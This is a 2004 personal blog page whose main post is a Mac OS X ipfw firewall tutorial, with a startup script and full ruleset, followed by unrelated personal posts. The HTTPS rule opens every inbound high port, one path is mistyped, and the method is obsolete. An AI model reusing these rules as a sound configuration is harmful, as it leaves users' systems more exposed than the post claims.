People who don't like typing big files by hand can download the file Firewall-config.tar from my website. This file contains all files which are to be placed in /Library/StartupItems/Firewall.

First things first

In a minute we'll start looking at how we create rules for our firewall. But as the title says: "First things first"! Because we want our own set of rules to bypass the OS X default rules we'll need to make sure that our configuration gets loaded right after the systems comes up. This is done by adding a new boot configuration for the firewall. I'll just show you all the steps I took, along with some explanations; that should make things clear enough.

First off, make sure that you're in a user account which is allowed to use the sudo command. This could be the Administrator account, but you could also modify your own account for this purpose. Then open up a Terminal.app window.

Last login: Sun Apr 4 09:46:44 on ttyp1

Welcome to Darwin!

kilala:~ thomas$ cd /Library

kilala:~ thomas$ sudo mkdir -p StartupItems/Firewall

Password:

kilala:~ thomas$ sudo chown -R root:wheel StartupItems

kilala:~ thomas$ sudo chmod -R 755 StartupItems

kilala:~ thomas$ cd StartupItems/Firewall

kilala:~ thomas$ sudo cp -rp /Systems/Library/StartupItems/NFS/* .

The previous commands created a new boot configuration directory for the service we will call Firewall. You setup the directories to have the proper ownerships and access permissions. Finally you copied over the startup configuration for the service called NFS as a basis for our own service.

Now I'm hoping that you are already familiar with the vi text editor, because we are going to make heavy use of it. If you have no clue how to use vi, please look up some tips on the Internet first!

kilala:~ thomas$ sudo vi StartupParameters.list

Modify the file to read as follows:

{

Description = "Firewall";

Provides = ("Firewall");

Requires = ("Resolver", "NetworkExtensions");

OrderPreference = "Late";

Messages =

{

start = "Starting custom firewall";

stop = "Stopping custom firewall";

};

}

kilala:~ thomas$ sudo mv NFS Firewall

kilala:~ thomas$ sudo vi Firewall

Modify the file to read as follows:

#!/bin/sh



##

# Setting up the Firewall rules at boot time

##

# Please note: added "FIREWALL=-YES-" entry to /etc/hostconfig



. /etc/rc.common



StartService ()

{

if [ "${FIREWALL:=-NO-}" = "-YES-" ]; then

ConsoleMessage "Adding Firewall Rules"

ipfw -f flush

exec /Library/StartupItems/Firewall/Ruleset

fi

}



StopService ()

{

ConsoleMessage "Removing all Firewall Rules"

ipfw -f flush

}



RestartService ()

{

ConsoleMessage "Removing all Firewall Rules"

ipfw -f flush

if [ "${FIREWALL:=-NO-}" = "-YES-" ]; then

ConsoleMessage "Adding Firewall Rules"

ipfw -f flush

exec /Library/StartupItems/Firewall/Ruleset

fi

}



RunService "$1"

We're almost there :) Only one more file to edit to set up the automatic booting.

kilala:~ thomas$ sudo vi /etc/hostconfig

Modify the file and add the following line at the bottom of the page:

FIREWALL=-YES-

Before setting up the rules

Now we'll get to the brunt of setting up our firewall. Most of the things discussed in this document are things that I had to learn in the course of a day, so please don't expect me to explain everything in detail ^_^; I was lucky enough to have enough past experience with iptables and ipchains, so that helped me in understanding the rules in the following chapter.

Unfortunately the rules below will only apply to people who have one network card in their system and who use a dial-up connection to the Internet. In my system the primary network card, which is used for my home network, is designated as en0. My Internet connection on the other hand is designated as ppp0. You can check your own settings by running the following command while you're connected to the Internet:

kilala:~ thomas$ ifconfig -a | grep UP

lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384

en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500

ppp0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1500

The interface lo0 is your loopback interface, which is a virtual network interface not actively used on the network itself. It is mainly used for communications within your system itself. You can recognise your network card by running the command ifconfig for each of the remaining interfaces (for instance ifconfig en0); your network card will have the IP address which is also set in the System Preferences pane.

My whole point is that, if you do not have the exact same situation as I have, you will have to modify the rules below insofar that you exchange each instance of "en0" with your network card name and each instance of "ppp0" with your Internet connection name. Also, if you have more than one network card, be sure to add additional rules for those interfaces as well.

Anyway. On with the show!

Almost there: entering the rules

Now you'll have to edit the final file in this whole setup. Make sure that you're still in the /Library/StartupItems/Firewall directory before going on.

kilala:~ thomas$ sudo vi Ruleset

This will also create a new file, which you will have to fill out completely as below. Once you're more familiar with how these rules work you could start adding rules for additional services. You may notice for example that I don't open up ports for IRC or AIM, since those are both services that I make no use of.

#!/bin/sh

# Firewall ruleset for T. Sluyter (Kilala.valhalla.org)

# Ver 1.00 3rd of April 2004

#

# Allows any and all network traffic on the "inside" network.

# Blocks almost all network traffic to and from the internet.



# Allows only a limited amount of network traffic to and from the internet.

#



# Allow a number in default traffic settings

ipfw add allow ip from any to any via lo0

ipfw add allow tcp from any to any established

ipfw add allow ip from any to any frag

ipfw add allow icmp from any to any icmptype 3,4,11,12

ipfw add deny log ip from 127.0.0.0/8 to any in

ipfw add deny log ip from any to 127.0.0.0/8 in

ipfw add deny log ip from 224.0.0.0/3 to any in

ipfw add deny log tcp from any to 224.0.0.0/3 in



# Allow any and all traffic coming through en0, from local network

ipfw add allow ip from 192.168.0.0/24 to any in recv en0

ipfw add allow ip from any to 192.168.0.0/24 out xmit en0

ipfw add allow tcp from 192.168.0.0/24 to any in recv en0

ipfw add allow tcp from any to 192.168.0.0/24 out xmit en0

ipfw add allow udp from 192.168.0.0/24 to any in recv en0

ipfw add allow udp from any to 192.168.0.0/24 out xmit en0

ipfw add allow icmp from any to any in recv en0

ipfw add allow icmp from any to any out xmit en0



# Allow FTP (File transfer) to the outside

ipfw add allow tcp from any 1024-65535 to any 20-21 out xmit ppp0

ipfw add allow tcp from any 20-21 to any 1024-65535 in recv ppp0



# Allow DNS lookups to outside

ipfw add allow udp from any 1024-65535 to any 53 out xmit ppp0

ipfw add allow udp from any 53 to any 1024-65535 in recv ppp0



# Allow SSH (Secure shell) to outside

ipfw add allow tcp from any 1024-65535 to any 22 out xmit ppp0

ipfw add allow tcp from any 22 to any 1024-65535 in recv ppp0



# Allow HTTP (Web browsing) to outside

ipfw add allow tcp from any 1024-65535 to any 80 out xmit ppp0

ipfw add allow tcp from any 80 to any 1024-65535 in recv ppp0

ipfw add allow tcp from any 1024-65535 to any 8080 out xmit ppp0

ipfw add allow tcp from any 8080 to any 1024-65535 in recv ppp0



# Allow HTTPS (Secure web browsing) to outside

ipfw add allow tcp from any to any 443 out xmit ppp0

ipfw add allow tcp from any to any 1024-65535 in recv ppp0



# Allow POP (Retrieving e-mail) to outside

ipfw add allow tcp from any 1024-65535 to any 110 out xmit ppp0

ipfw add allow tcp from any 110 to any 1024-65535 in recv ppp0



# Allow SMTP (Sending e-mail) to outside

ipfw add allow tcp from any 1024-65535 to any 25 out xmit ppp0

ipfw add allow tcp from any 25 to any 1024-65535 in recv ppp0



# Allow ICMP to and from outside

ipfw add allow icmp from any to any in recv ppp0

ipfw add allow icmp from any to any out xmit ppp0



# Block all of the rest, along with logging

ipfw add deny log tcp from any to any in recv ppp0

ipfw add deny log udp from any to any in recv ppp0

ipfw add deny log ip from any to any in recv ppp0

ipfw add deny log tcp from any to any out xmit ppp0

ipfw add deny log udp from any to any out xmit ppp0

ipfw add deny log ip from any to any out xmit ppp0

Finishing touches

Before we start rebooting our systems it might be wise to first check if our startup scripts are in full working order. You never know what happens if things aren't written a hundred percent correctly ;)

Luckily Apple has provided us with a command which can be used to run a startup script as if the system was rebooting just now. Running the following command should give you a properly configured firewall.

kilala:~ thomas$ sudo SystemStarter start Firewall

Now don't worry if running this command gives you loads of errors about the ppp0 interface not being unavailable. This is of course normal if you're starting the firewall without being logged into the Internet. Like I said: don't worry! The firewall will work properly. You may check if the firewall rules are properly loaded by running:

kilala:~ thomas$ sudo ipfw list

This command should return a list of 41 rules if you followed my example to the letter. You can count them by running sudo ipfw list | wc -l. If all of this seems to work properly, you should reboot your system. Once it's restarted, run the ipfw list command again to see if the firewall came up properly.

And that's about it! ^_^ Congratulate yourself on a job well done and rest assured that you're surfing the web a little bit safer.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Overheating Powermac G5

2004-03-28 08:12:00

Well, Apple has finally gotten rid of the overheating hard disk problems. Unfortunately the did not choose to relocate the thermo sensors for free, but they issued an update for Fan Control, which apparently is part of OS X. Jaguar users can download this pa tch seperately at Apple's Support pages, while Panther users get this update as a part of the 'jumbo patch' 10.3.3.


kilala.nl tags: , ,

View or add comments (curr. 0)

Travelling to Brussels, teaching a course

2004-02-10 08:01:00

Ah! This feels so incredibly good! ^_^

Today I'm travelling to Brussels, instead of heading off to the office like any other day, to give a short course to our IT colleagues over there. We're busy on a very exciting (and tiring) project which involves migrating hundreds of servers from London, over to the EU mainland. These servers will be placed within domains which involve a certain piece of security software that we use at $CLIENT, and the course I'm about to give covers just that!

Anyway. Not to delve too much into our company politics :) The reason I'm feeling so well this morning (it's about 8:30 now) is because I get to take the Thalys train into Brussels! This involves getting up at five in the morning, riding a luxury cab to Schiphol airport and then getting on the train around 7:15. $CLIENT even sprang for a first class ticket for me! So that means that I get to sit in a _very_ comfy seat, while working on the company's laptop and getting pampered by two lovely ladies. Don't you just _love_ a good, free breakfast?!

Speaking of pampering: I just booked a cab ride in Brussels _from_ the train! ^_^ This is so weird! I just can't help feeling giddy with excitement. (Gee Cailin! I guess you don't get around much, do you?!)

And speaking of laptops: right now I'm working on this HP Omnibook I borrowed from the company. It's running NT4, so it's both slow and instable : ( But my experiences during the last two weeks have lead me to decide that I seriously want a laptop of my own. Preferably an iBook of course! It's unbelievable how bloody useful these contraptions are and the amount of work I can get done with them while on the road!

Aniway, I'd better get back to work now! I'll be arriving at Brussels around 9:30, so I'd better review my course material one more time *shudder*

Cheers!


kilala.nl tags: , , ,

View or add comments (curr. 0)

My switch to Apple and other updates

2003-11-11 21:32:00

Another day, another update :)

Last week I went out and bought my lovely Apple G5 tower... It's the basic single 1.6 GHz processor model and I've gone for all of the vanilla options. Later on, when/if I get more money, I'll upgrade the RAM with 512 MB extra and I'll add a second S-ATA hard drive for all of our home videos (which as of yet we still have to start making :P).

Anyway: I'm quite pleased with the comuter! It simply oozes sex and the OS, while it takes getting used to, is quite pleasent in daily use. Right now I'm waiting for my back order on Final Cut Express (w00t on the e250+ discount when buying an Apple) and on OS X 10.3 (aka Panther). The only thing missing right now is the GIMP, which is my favourite imaging tool. For all of you fellow amateurs out there who'd like a cheap/free alternative to Photoshop, check out http://www.gimp.org.

Work's still interesting/fun, although quite busy: currently I'm juggling about seven projects, trying to spread them all out evenly over my four day work weak (don't you just love working at a bank?!) which is quite a hassle, since oftentimes people'll jump in with extra work that needs to be done yesterday. Anyway, eventhough I may sometimes complain or bitch a little, I'm still quite happy at ${Customer}. ^_^

On a final note, about two weeks ago Marli and me visited 'het Spellen Spektakel', which is the Netherlands' largest game show. Once a year the city of Eindhoven is flooded by kids, parents and gaming geeks who all trud into the trade show building. Now, when I say "game" in this case I mean "board games" and "table top games" etc. We bought a _lot_ of stuff over there (among others over five booster displays for the Harry Potter CCG and two displays of Card Captor Sakura CCG), but overall we found the show to be a bit boring so we left quite early.

The two days after buying my new computer were filled with ups and downs, making for a couple of very hectic days with mood swings that quite contrasted each other. Not too good as you can image -_-' Anyway: check out the comic!

As you can see I've switched to another form of layout and story telling. I'm still getting used to it and might switch back to my original form in the future, but right now I'm quite pleased with how much this layout lets me tell. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Older blog posts